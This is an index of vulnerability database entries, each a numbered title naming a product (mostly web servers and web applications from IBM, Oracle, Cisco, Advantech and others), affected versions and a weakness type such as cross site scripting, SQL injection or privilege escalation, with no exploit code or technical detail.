[90891] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 CSRF Token information disclosure
[90889] Foreman up to 1.12.1 host_edit_interfaces.js cross site scripting
[90886] Foreman up to 1.11.3/1.12.0 API interfaces Config information disclosure
[90858] Cisco FirePOWER Management Center up to 4.x/5.3.0.2/5.3.1.1/5.4.0.0 Web-based GUI privilege escalation
[90856] W-Agora Web Forum index.php directory traversal
[90855] NetworkActiv Web Server denial of service
[90848] Horde IMP Webmail up to 3.2.5 cross site scripting
[90837] BEA Systems WebLogic up to 5.1/6.1 SP6/7.0 SP5/8.1 SP2 JNDI Internal Object information disclosure
[90648] SAP HANA SQL Interface User information disclosure
[90647] SAP HANA up to Revision 101 SQL Interface privilege escalation
[90597] IBM WebSphere Portal up to 5.0.1 Connections Portlets privilege escalation
[90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console cross site scripting
[90453] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0.0.0 SIP privilege escalation
[90452] Cisco IOS 15.5(3)S3/15.6(1)S2/15.6(2)S1/15.6(2)T1 NTP Interface Queue privilege escalation
[90379] IBM WebSphere Portal 6.1/7.0.0.2/8.0.0.1/8.5 cross site scripting
[90371] Cisco Unified Computing System up to 2.0.0 Web Framework privilege escalation
[90249] Microsoft Exchange Outlook Web Access privilege escalation
[90160] Imatix Xitami Web Server /cgi-bin/testcgi information disclosure
[90153] BEA WebLogic 5.1.0 HTTP GET Request /snoop information disclosure
[90143] Django 1.8.13/1.9.7 Admin Interface views/debug.py cross site scripting
[90064] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90062] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90061] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90060] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90059] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90058] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90057] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability
[90056] Oracle 8.2/8.3/8.4 Web access weak authentication
[90055] Oracle 8.3/8.4/15.1/15.2/16.1 Web Access unknown vulnerability
[90053] Oracle up to 16.1 Web access unknown vulnerability
[90052] Oracle up to 16.1 Web access privilege escalation
[89981] Oracle Siebel Engineering 8.1.1/8.2.2/IP2014/IP2015/IP2016 Web Server information disclosure
[89966] Oracle Agile PLM 9.3.4/9.3.5 WebClient/Admin unknown vulnerability
[89949] Oracle Transportation Management up to 6.4.1 Web Container privilege escalation
[89935] Oracle Application Object Library 12.1.3/12.2.3/12.2.4/12.2.5 Web based help screens information disclosure
[89908] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Web Container denial of service
[89907] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0 Analytics Web Administration unknown vulnerability
[89906] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0 Web Server unknown vulnerability
[89902] Oracle Access Manager 10.1.4.x/11.1.1.7 Web Server Plugin information disclosure
[89901] Oracle WebCenter Sites 11.1.1.8/12.2.1.0 unknown vulnerability
[89898] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/11.2.1.0.0 Analytics Web General unknown vulnerability
[89897] Oracle WebCenter Sites 11.1.1.8/12.2.1.0 unknown vulnerability
[89894] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0 Analytics Web Administration unknown vulnerability
[89875] Oracle WebLogic Server 12.1.3.0/12.2.1.0 Web Container memory corruption
[89874] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 memory corruption
[89873] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 memory corruption
[89872] Oracle GlassFish Server 3.0.1/3.1.2 Web Container memory corruption
[89848] Apple tvOS up to 9.2.1 WebKit Page Loading cross site scripting
[89847] Apple tvOS up to 9.2.1 WebKit Page Loading memory corruption
[89846] Apple tvOS up to 9.2.1 WebKit denial of service
[89845] Apple tvOS up to 9.2.1 WebKit privilege escalation
[89844] Apple tvOS up to 9.2.1 WebKit Memory memory corruption
[89843] Apple tvOS up to 9.2.1 WebKit race condition
[89842] Apple tvOS up to 9.2.1 WebKit memory corruption
[89841] Apple tvOS up to 9.2.1 WebKit memory corruption
[89840] Apple tvOS up to 9.2.1 WebKit memory corruption
[89839] Apple tvOS up to 9.2.1 WebKit memory corruption
[89838] Apple tvOS up to 9.2.1 WebKit memory corruption
[89837] Apple tvOS up to 9.2.1 WebKit memory corruption
[89658] Sun iPlanet Web Server /.perf information disclosure
[89620] Cisco WebEx Meetings Server 2.7 cross site request forgery
[89598] BEA WebLogic Server up to 4.5.1/4.5.2/6.1 SP 2 Source information disclosure
[89497] Monit Web Server denial of service
[89496] Monit Web Server Basic Header denial of service
[89469] Cisco WebEx Meetings Server 2.6 privilege escalation
[89468] Cisco WebEx Meetings Server 2.6 cross site scripting
[89466] Cisco WebEx Meetings Server 2.6 sql injection
[89459] IBM Tivoli Directory Server up to 6.1.0/6.2.0/6.3.0/6.3.1 Web Administration Tool information disclosure
[89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication
[89278] Zeus Web Server vs_diag.cgi cross site scripting
[89243] Juniper Junos J-Web weak authentication
[89171] ZyXEL Prestige 642R/Prestige 642R-I Administration Interface weak authentication
[89146] David Yuan Forum Web Server up to 1.60 privilege escalation
[89000] Moxa 5232-N Web Console weak authentication
[88890] Michael Lamont Savant Web Server 3.1 GET Request Folder privilege escalation
[88854] Zeus Webserver up to 4.0/4.1 r5/4.2/4.2 r2 vs_diag.cgi privilege escalation
[88842] Dune Web Server 0.6.7 privilege escalation
[88840] WebCalendar long.php File information disclosure
[88824] IBM WebSphere Application Server 8.5.5.8/8.5.5.9 API Discovery privilege escalation
[88823] IBM WebSphere Application Server up to 8.5.5.8 JAX-RS API Cookie information disclosure
[88816] IBM WebSphere Application Server up to 8.5.5.2 Admin Center information disclosure
[88743] Citrix Nfuse Webserver information disclosure
[88732] Check Point Firewall-1 Web Administration information disclosure
[88726] BEA WebLogic Server 5.1/6.1/7.0/7.0.0.1 Certificate weak authentication
[88681] Instaboard Web Forum sql injection
[88641] IBM Domino Server Web Request privilege escalation
[88611] 4D WebStar FTP Server Authentication memory corruption
[88595] IBM WebSphere 2.0/3.0/3.0.2/3.0.2.1 cross site scripting
[88588] Roxen Challenger Webserver Counter Module denial of service
[88535] IBM WebSphere Message Broker up to 8.0.0.7 Integration Server Version information disclosure
[88530] IBM WebSphere DataPower XC10 appliance 2.1/2.5 CLI memory corruption
[88527] IBM WebSphere Commerce 7.0 FP8/8.0.0.9/8.0.1.1 cross site request forgery
[88526] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0/8.5.0.2/8.6.0.7 information disclosure
[88507] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0/8.5.0.2/8.6.0.7 privilege escalation
[88484] BEA WebLogic 3.2.1/4.0.0 default.jsp Source information disclosure
[88481] Check Point Software Firewall-1 Client Authentication Web Server information disclosure
[88448] IBM WebSphere Commerce 6.0/7.0/8.0 Store Pages cross site scripting
[88444] Webmin information disclosure
[88411] Michael Lamont Savant Web Server 3.0 HTTP GET Request denial of service
[88409] Northern Solutions Xeneo Web Server 2.2.9.0 denial of service
[88407] MDG Web Server 4d 3.6.0 HTTP GET Request denial of service
[88385] Symantec Endpoint Protection Manager up to 12.1.6 MP4 Authentication Interface privilege escalation
[88364] IBM WebSphere MQ up to 8.0.0.4 Queue-Manager Agent denial of service
[88334] Cisco Web Security Appliance FTP denial of service
[88333] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 HTTP Response Splitting privilege escalation
[88323] Xitami Web Server 2.4 c3/2.4 d3 memory corruption
[88306] SalD Dr. Web Anti Virus up to 4.28 File Name memory corruption
[88295] BEA WebLogic Server up to 6.0 directory traversal
[88294] BEA WebLogic up to 7.0.0.1 SP2 Redirect Hostname information disclosure
[88255] Web Server HTTP Method information disclosure
[88178] Microsoft Windows Network Interface information disclosure
[88141] Alt-N MDaemon 12.5.6/13.0.3 WebAdmin User Account Import privilege escalation
[88110] Advantech WebAccess up to 8.1 ActiveX Control privilege escalation
[88107] IBM WebSphere Portal up to 8.5 CF10 cross site request forgery
[88094] EMC Documentum Administrator IAPI/IDQL Interface privilege escalation
[87881] EMC RSA Archer eGRC 5.5.x Backup File web.config Password information disclosure
[87829] Trihedral VTScada up to 11.2.01 WAP Interface memory corruption
[87826] Trihedral VTScada up to 11.2.01 WAP Interface weak authentication
[87731] Epoch Web Mailing List up to 0.31 cross site scripting
[87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
[87696] Cisco Web Security Appliance/Email Security Appliance Advance Malware Protection libclamav memory corruption
[87642] Cisco WebEx Meeting Center User information disclosure
[87553] Cisco Unified Computing System 1.4(1a) Management Interface cross site scripting
[87549] Cisco Web Security Appliance up to 8.8 HTTP Response Code Memory denial of service
[87548] Cisco Web Security Appliance up to 8.8 HTTP Length Request privilege escalation
[87547] Cisco Web Security Appliance 8.5/8.6/8.7/8.8/9.1 Cached File Memory denial of service
[87546] Cisco Web Security Appliance up to 8.5.3-055 HTTP POST Request privilege escalation
[87412] IBM WebSphere Application Server up to 7.0.0.40/8.0.0.12/8.5.5.9 FIPS 140-2 information disclosure
[87076] IBM Tivoli Access Manager for e-business ibm/wpm/webseal cross site scripting
[86859] JBoss Web Console createThresholdMonitor.jsp cross site scripting
[86770] HotScripts PHP Website Script lostpassword.php cross site scripting
[86769] HotScripts PHP Website Script feedback.php cross site scripting
[86721] WebSPELL awards.php sql injection
[86714] GlassFish Enterprise Server webServicesGeneral.jsf cross site scripting
[86695] HP Embedded Web Server config cross site request forgery
[86694] HP Embedded Web Server config cross site request forgery
[86388] IBM WebSphere Application Server cross site scripting
[86369] WebCalendar search.php cross site scripting
[86368] WebCalendar pref.php cross site scripting
[86050] Weblogicnet es_offer.php privilege escalation
[86049] Weblogicnet es_custom_menu.php privilege escalation
[85516] Web-app.org WebAPP cross site scripting
[85261] PhpWebGallery Search.php cross site scripting
[85165] Web-app.org WebAPP information disclosure
[85164] Web-app.org WebAPP cross site scripting
[85163] Web-app.org WebAPP cross site scripting
[85162] Web-app.org WebAPP cross site scripting
[85161] Web-app.org WebAPP cross site scripting
[85160] Web-app.org WebAPP cross site scripting
[85159] Web-app.org WebAPP cross site scripting
[85158] Web-app.org WebAPP cross site scripting
[85156] cPanel WebHost Manager scripts2/objcache privilege escalation
[85153] MailEnable Web Mail Forms/MAI/list.asp cross site scripting
[85152] MailEnable Web Mail right.asp cross site scripting
[85135] Hitachi Web Server cross site scripting
[85132] Symantec Web Security cross site scripting
[85055] Joomla CMS weblinks.php sql injection
[84731] PHP Web WebYep WYShortTextElement.php privilege escalation
[84730] PHP Web WebYep WYMenuElement.php privilege escalation
[84729] PHP Web WebYep WYLoopElement.php privilege escalation
[84728] PHP Web WebYep WYLongTextElement.php privilege escalation
[84727] PHP Web WebYep WYLogonButtonElement.php privilege escalation
[84726] PHP Web WebYep WYImageElement.php privilege escalation
[84725] PHP Web WebYep WYGuestbookElement.php privilege escalation
[84724] PHP Web WebYep WYGalleryElement.php privilege escalation
[84723] PHP Web WebYep WYTextArea.php privilege escalation
[84722] PHP Web WebYep WYSelectMenu.php privilege escalation
[84721] PHP Web WebYep WYPopupWindowLink.php privilege escalation
[84720] PHP Web WebYep WYPath.php privilege escalation
[84719] PHP Web WebYep WYLink.php privilege escalation
[84718] PHP Web WebYep WYLanguage.php privilege escalation
[84717] PHP Web WebYep WYImage.php privilege escalation
[84716] PHP Web WebYep WYHTMLTag.php privilege escalation
[84715] PHP Web WebYep WYFile.php privilege escalation
[84714] PHP Web WebYep WYElement.php privilege escalation
[84713] PHP Web WebYep WYEditor.php privilege escalation
[84712] PHP Web WebYep WYDocument.php privilege escalation
[84691] Comdev Web Blogger include.php privilege escalation
[84518] Webmin/Usermin cross site scripting
[84069] WebprojectDB lang.php privilege escalation
[83632] Quick 'n Easy Web Server File Name privilege escalation
[83619] 1WebCalendar mainCal.cfm sql injection
[83618] 1WebCalendar /news/newsView.cfm sql injection
[83563] Easy File Sharing Web Server option.ini information disclosure
[83347] PhpWebGallery picture.php sql injection
[83346] PhpWebGallery category.php sql injection
[83293] Web4Future eCommerce viewbrands.php sql injection
[83292] Web4Future eCommerce index.php sql injection
[83241] WebCalendar export_handler.php sql injection
[83240] WebCalendar edit_template.php sql injection
[83239] WebCalendar admin_handler.php sql injection
[83238] PHP Web Statistik HTTP Header pixel.php cross site scripting
[83237] PHP Web Statistik Log Database logdb.dta information disclosure
[83153] SAP Web Application Server Test Application cross site scripting
[83152] SAP Web Application Server privilege escalation
[83044] Invision Power Board Admin Interface cross site scripting
[83043] Invision Power Board Admin Interface cross site scripting
[83042] Invision Power Board Admin Interface cross site scripting
[83040] Invision Power Board Admin Interface cross site scripting
[83039] Invision Power Board Admin Interface cross site scripting
[83033] Cisco WebEx Meetings Server 2.6 Redirect
[83009] PHP-Nuke Web_Links Module sql injection
[82883] Baby Web Server File privilege escalation
[82750] Ecava IntegraXor up to 5.0 HMI Web Server weak encryption
[82608] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Core Components unknown vulnerability
[82604] Oracle WebLogic Server 10.3.6 Console unknown vulnerability
[82603] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 Analytics Web General unknown vulnerability
[82600] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Console unknown vulnerability
[82599] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Console unknown vulnerability
[82598] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Console unknown vulnerability
[82593] Oracle iPlanet Web Server 7 Security memory corruption
[82592] Oracle iPlanet Web Proxy Server 4 Security memory corruption
[82591] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Java Messaging Service unknown vulnerability
[82590] Oracle WebCenter Sites 11.1.1.8.0/12.2.1 privilege escalation
[82489] Ashleys Web Server HTTP Request memory corruption
[82443] OpenStack Object Storage Staticweb Middleware information disclosure
[82390] Citrix Command Center up to 5.1/5.2 Web UI sql injection
[82374] MCPWS Personal Webserver File Request denial of service
[82358] TinyWeb Web Server CGI Request denial of service
[82356] Novell NetWare Enterprise Web Server /com Path information disclosure
[82355] Novell NetWare Enterprise Web Server /com/novell/webaccess Directory information disclosure
[82354] Microsoft IIS WebDAV denial of service
[82340] Horde Groupware Webmail Edition up to 5.2.11 _menubar.html.php cross site scripting
[82320] Horde Groupware Webmail Edition up to 5.2.11 Html.php _renderVarInput_number cross site scripting
[82276] Palo Alto PAN-OS up to 5.0.17/5.1.10/6.0.12/6.1.9/7.0.2H1 Device Management Command Line Interface privilege escalation
[82062] Lenovo LenovoEMC EZ Media / Backup up to 4.1.204 Management Interface 7PK Security Features
[82003] Web Wiz Forums pop_up_ip_blocking.asp denial of service
[81994] BEA WebLogic Deleted Group privilege escalation
[81933] BEA WebLogic HTTP Request cross site scripting
[81844] Linksys WRT54G Web Server denial of service
[81829] PHP Based Web Chat Manager register.php cross site scripting
[81825] BEA Systems WebLogic Server up to 7.0 SP 1/7.0.0.1 SP 1 memory corruption
[81820] Web Wiz Forums 6.34 asp information disclosure
[81819] Nokia IPSO Voyager WebGUI /cgi-bin/readfile.tcl File information disclosure
[81749] AutomatedShops WebC.cgi privilege escalation
[81748] Netscape iPlanet Web Server /.perf information disclosure
[81729] Tmax Soft JEUS Web Application Server 3.1.4pl/3.2.2 url.jsp cross site scripting
[81635] Cisco Prime Infrastructure up to 2.2.2 Web API RBAC privilege escalation
[81404] IBM WebSphere Process Server up to 7.0.0.6 Business Space privilege escalation
[81395] IBM WebSphere Application Server up to 8.5.5.8 OpenID Connect OIDC Client cross site scripting
[81321] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9/8.0.0.2 Order privilege escalation
[81153] Linux Kernel AIO Interface fs/aio.c memory corruption
[81149] Cisco Web Security Appliance Web Proxy privilege escalation
[81126] Synacor Zimbra Collaboration 8.0.9 Interface cross site request forgery
[81124] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF09 XML Parser XML External Entity
[81123] IBM WebSphere Portal cross site scripting
[81122] IBM WebSphere Portal cross site scripting
[81121] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9 privilege escalation
[81116] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 cross site scripting
[81115] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 cross site scripting
[81114] IBM WebSphere Portal up to 7.0.0.2 CF29/8.0.0.1 CF19/8.5.0.0 CF08 Authoring UI privilege escalation
[81113] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 Redirect
[81059] Moodle up to 2.6.11/2.7.10/2.8.8/2.9.2 core_enrol_get_enrolled_users Web Service enrol/externallib.php privilege escalation
[81013] Dell SonicWall up to 7.2/8.0/8.1 GMS ViewPoint Web Application privilege escalation
[81011] Citrix Netscaler Application Delivery Controller up to 10.5 NS Web GUI Command privilege escalation
[80967] IBM Security Access Manager for Web up to 8.0.1.3 IF3/9.0.0.1 cross site scripting
[80965] IBM WebSphere Portal LDAP privilege escalation
[80964] IBM WebSphere Commerce Enterprise 7.0.0.8/7.0.0.9 Update Installer information disclosure
[80959] IBM Security Access Manager For Web Appliance up to 7.0.0 IF18/8.0.1.3 IF2/9.0.0.0 SSH weak encryption
[80958] IBM Security Access Manager for Web up to 7.0.0 IF20/8.0.1.3 IF3/9.0.0.1 Login 7PK Security Features
[80955] IBM Security QRadar SIEM up to 7.1 MR2 Patch 11 Web UI privilege escalation
[80891] Adobe Connect up to 95.1 User Interface privilege escalation
[80814] Cisco WebEx Meetings Server 2.5.1.5 cross site scripting
[80716] Rockwell Automation Allen-Bradley MicroLogix 1100 up to 15.000 Web Request memory corruption
[80707] IBM WebSphere Portal up to 8.5.0 CF08 cross site scripting
[80637] IBM WebSphere Application Server up to 7.0.0.40/8.0.0.11/8.5.5.8 cross site scripting
[80611] Cisco Web Security Appliance 8.5.3-055/9.1.0-000/9.5.0-235 Proxy Engine 7PK Security Features
[80384] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 WLS-Console unknown vulnerability
[80374] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Core Components unknown vulnerability
[80373] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Coherence Container unknown vulnerability
[80372] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Java Messaging Service unknown vulnerability
[80371] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 XML Parser privilege escalation
[80370] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Core Components unknown vulnerability
[80369] Oracle WebLogic Portal 10.3.6 Core Services privilege escalation
[80368] Oracle WebCenter Sites 7.6.2/11.1.1.8.0 privilege escalation
[80313] IBM WebSphere Commerce up to 8.0.0.0 cross site scripting
[80312] IBM WebSphere Commerce up to 8.0.0.0 cross site scripting
[80308] IBM WebSphere MQ Light up to 1.0.1 MQXR Service denial of service
[80290] Juniper Junos up to 14.2 J-Web privilege escalation
[80277] Advantech WebAccess up to 8.0 BwpAlarm Subsystem memory corruption
[80276] Advantech WebAccess up to 8.0 Kernel Service Numeric Error
[80275] Advantech WebAccess up to 8.0 memory corruption
[80274] Advantech WebAccess up to 8.0 memory corruption
[80273] Advantech WebAccess up to 8.0 memory corruption
[80272] Advantech WebAccess up to 8.0 File directory traversal
[80271] Advantech WebAccess up to 8.0 File Upload privilege escalation
[80270] Advantech WebAccess up to 8.0 information disclosure
[80269] Advantech WebAccess up to 8.0 Folder privilege escalation
[80268] Advantech WebAccess up to 8.0 memory corruption
[80262] Advantech WebAccess up to 8.0 Browser Plugin privilege escalation
[80256] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9/7.0 FP8 cross site request forgery
[80255] Advantech WebAccess up to 8.0 cross site scripting
[80254] Advantech WebAccess up to 8.0 sql injection
[80253] Advantech WebAccess up to 8.0 cross site request forgery
[80252] Advantech WebAccess up to 8.0 information disclosure
[80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting
[80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting
[80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting
[80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting
[80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure
[80175] IBM WebSphere Message Broker up to 7.0.0.7/8.0.0.5 HTTP Server information disclosure
[80132] IBM WebSphere Commerce up to 7.0 FP8 Aurora Starter Redirect
[80001] IBM WebSphere MQ Light up to 1.0.1 MQXR Service Code
[80000] IBM WebSphere MQ Light up to 1.0.1 TLS Handshake Code
[79919] IBM WebSphere Portal 6.1/7.0/8.0/8.5 AccessControl REST API information disclosure
[79879] Schneider Electric Modicon M340 BMXNOx/BMXPx GoAhead Web Server memory corruption
[79823] Cisco Unified Communications Manager 10.5(0.98000.88) WebApplications Identity Management Subsystem denial of service
[79776] IBM InfoSphere BigInsights 3.0/3.0.0.1/3.0.0.2 HiveServer2 Interface weak authentication
[79746] IBM WebSphere Application Server 8.0/8.5/8.5.5 Edge Component Caching Proxy information disclosure
[79418] Cisco WebEx Meetings Application up to 8.5.0 on Android privilege escalation
[79409] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting
[79408] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting
[79407] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting
[79406] IBM WebSphere Portal 6.1/7.0/8.0/8.5 Document Upload denial of service
[79346] Cisco Web Security Appliance 8.0.7-142/8.5.1-021 Native FTP denial of service
[79298] Cisco ASA 8.4 Management Interface denial of service
[79272] Exemys Telemetry Web Server HTTP Location Header privilege escalation
[79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module privilege escalation
[79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
[79213] IBM WebSphere Portal up to 8.0.0.1 CF18/8.5.0 CF08 denial of service
[79210] Cisco IOS 15.2(04)M/15.4(03)M Virtual PPP Interface ACL privilege escalation
[79114] SAP HANA DB 1.00.73.00.389160 SQL Interface privilege escalation
[79111] SAP HANA DB 1.00.73.00.389160 Web Dispatcher Service information disclosure
[79077] IBM WebSphere Commerce Enterprise up to 7.0.0.8 REST URL information disclosure
[79074] IBM Security Access Manager For Web up to 7.0.0.15/8.0.1.2 WebSEAL HTTPTransformation Request File Code
[79070] IBM WebSphere Application Server up to 6.1.0.47/7.0.0.38/8.0.0.11/8.5.5.7 privilege escalation
[79049] Cisco Web Security Appliance 8.5.3-051 File-Range Request denial of service
[79047] Cisco Web Security Appliance 8.5.3-051 Proxy Cache denial of service
[78944] IBM WebSphere Portal up to 8.5.0 CF07 privilege escalation
[78910] IBM WebSphere Portal privilege escalation
[78876] Red Hat JBoss Enterprise Application Platform up to 6.4.3 HTTP Management Interface memory corruption
[78875] Red Hat JBoss Enterprise Application Platform up to 6.4.3 EAP Web Console Mouse 7PK Security Features
[78874] Red Hat JBoss Enterprise Application Platform up to 6.4.3 EAP Web Console cross site request forgery
[78866] Cisco Wireless LAN Controller 7.4(140.0)/8.0(120.0) Web Management GUI privilege escalation
[78863] IniNet embeddedWebServer up to 2.01 Path directory traversal
[78862] IniNet embeddedWebServer up to 2.01 URL Encoding File privilege escalation
[78861] IniNet embeddedWebServer up to 2.01 HTTP Request memory corruption
[78658] Oracle Integrated Lights Out Manager (ILOM) 3.0/3.1/3.2 Web unknown vulnerability
[78575] Oracle Fusion Middleware 7.6.2/11.1.1.6.1/11.1.1.8.0 WebCenter Sites unknown vulnerability
[78574] Oracle Fusion Middleware 10.1.3.5.1 WebCenter Content unknown vulnerability
[78573] Oracle Fusion Middleware 10.1.3.5.1 WebCenter Content unknown vulnerability
[78568] Oracle Fusion Middleware 7.6.2/11.1.1.6.1/11.1.1.8.0 WebCenter Sites privilege escalation
[78501] Juniper Junos up to 15.1 on vSRX J-Web denial of service
[78492] SAP HANA 1.00.091.00.1418659308 Web-Based Development Workbench test-net.xsjs privilege escalation
[78491] SAP HANA DB 1.00.73.00.389160 Web-Based Development Workbench cross site scripting
[78489] SAP HANA DB 1.00.091.00.1418659308 Web-Based Development Workbench cross site scripting
[78374] Microsoft SharePoint Server/Office Web Apps cross site scripting
[78357] Cisco Prime Collaboration Assurance 10.5(1) Web Framework information disclosure
[78247] Canary Labs Trend Web Server up to 9.5.1 TCP Packet memory corruption
[78224] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 cross site scripting
[78223] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Lockout weak authentication
[78222] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Session weak authentication
[78221] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 privilege escalation
[78220] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Logout privilege escalation
[78219] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 cross site request forgery
[78218] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Session Cookie information disclosure
[78206] IBM Content Template Catalog/WebSphere Portal cross site scripting
[78152] Splunk Enterprise up to 6.2.5 Web cross site scripting
[78066] Advantech WebAccess up to 8.0 memory corruption
[78063] Schneider Electric InduSoft Web Studio up to 7.x Remote Agent privilege escalation
[77947] Cisco Prime Collaboration Provisioning up to 10.x Web Framework privilege escalation
[77946] Cisco Prime Collaboration Assurance up to 10.5.1 Web Framework privilege escalation
[77945] Cisco Prime Collaboration Assurance up to 10.5.1 Web Framework privilege escalation
[77761] Symantec Web Gateway 5.2.2 PHP Script sql injection
[77759] Symantec Web Gateway 5.2.2 privilege escalation
[77758] Symantec Web Gateway 5.2.2 admin_messages.php privilege escalation
[77757] Symantec Web Gateway 5.2.2 PHP Script cross site scripting
[77756] Symantec Web Gateway 5.2.2 Console privilege escalation
[77699] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site scripting
[77698] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site request forgery
[77692] IBM WebSphere Commerce 7.0.0.6/7.0.0.7/7.0.0.8/7.0.0.9 information disclosure
[77691] IBM WebSphere Portal denial of service
[77672] Moxa EDS-405A/EDS-408A up to 3.5 GoAhead Web Server denial of service
[77663] IBM WebSphere MQ up to 7.0.1.12 MQI Call denial of service
[77662] Advantech WebAccess up to 8.0.0 DLL File memory corruption
[77658] Cisco Web Security Appliance 8.0.7 TCP Connection Close memory corruption
[77657] Cisco Web Security Appliance 8.0.6-078/8.0.6-115 DNS Processor denial of service
[77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting
[77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting
[77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure
[77492] OkCupid OK Web Server 404 Error Message libahttp/err.c cross site scripting
[77377] IBM Integration Bus/WebSphere Message Broker Security Profile information disclosure
[77370] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 information disclosure
[77369] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 Servlet weak authentication
[77357] EMC WebTop cross site request forgery
[77332] Cisco WebEx Node for Media Convergence Server Redirect
[77273] pfSense up to 2.2.2 WebGUI services_captiveportal_zones.php cross site scripting
[77039] Microsoft Windows up to Vista WebDAV SSL weak encryption
[76939] Websense Triton Content Manager 8.0.0 handle_debug_network memory corruption
[76907] GE Healthcare Optima MR360 HIPAA Configuration Interface privilege escalation
[76897] IBM WebSphere eXtreme Scale up to 8.6.0.8 denial of service
[76852] Fortinet FortiOS up to 5.2.3 DHCP Monitor Web UI cross site scripting
[76843] Cisco UCS Central Software 1.3(0.99) Web Framework File privilege escalation
[76830] Cisco Web Security Appliance 8.3.6-048/8.5.0-000/8.5.7-042 LDAP weak encryption
[76827] Cisco Web Security Appliance 8.5.6-113/9.1.0-032/9.1.1-000/9.6.0-000 cross site scripting
[76812] Ruby on Rails up to 3.x/4.x Web Console request.rb Blacklist privilege escalation
[76805] Cisco Unified MeetingPlace Web Conferencing up to 8.5/8.6 Password Change privilege escalation
[76799] EMC Avamar Server up to 7.1.1 Desktop/Laptop Interface information disclosure
[76791] Cisco WebEx Meetings Server 2.5 MR1 cross site request forgery
[76762] Cisco WebEx Meeting Center Admin Site cross site scripting
[76761] Cisco WebEx Meeting Center cross site scripting
[76760] Cisco WebEx Training Center cross site scripting
[76657] Cisco WebEx Meetings Server 2.5MR1 privilege escalation
[76644] Oracle Fusion Middleware 11.1.1.7.0 Web Cache unknown vulnerability
[76638] Oracle E-Business Suite up to 12.2.4 Web Management unknown vulnerability
[76631] Oracle E-Business Suite 11.5.10.2/12.0.6/12.1.3/12.2.3/12.2.4 Web Applications Desktop Integrator unknown vulnerability
[76446] IBM WebSphere Portal up to 8.0.0.1 CF16/8.5.0 CF05 cross site scripting
[76445] IBM WebSphere Application Server up to 8.0.0.10/8.5.5.5 Administrative Console privilege escalation
[76444] IBM WebSphere Application Server up to 7.0.038/8.0.0.10/8.5.5.5 Webcontainer privilege escalation
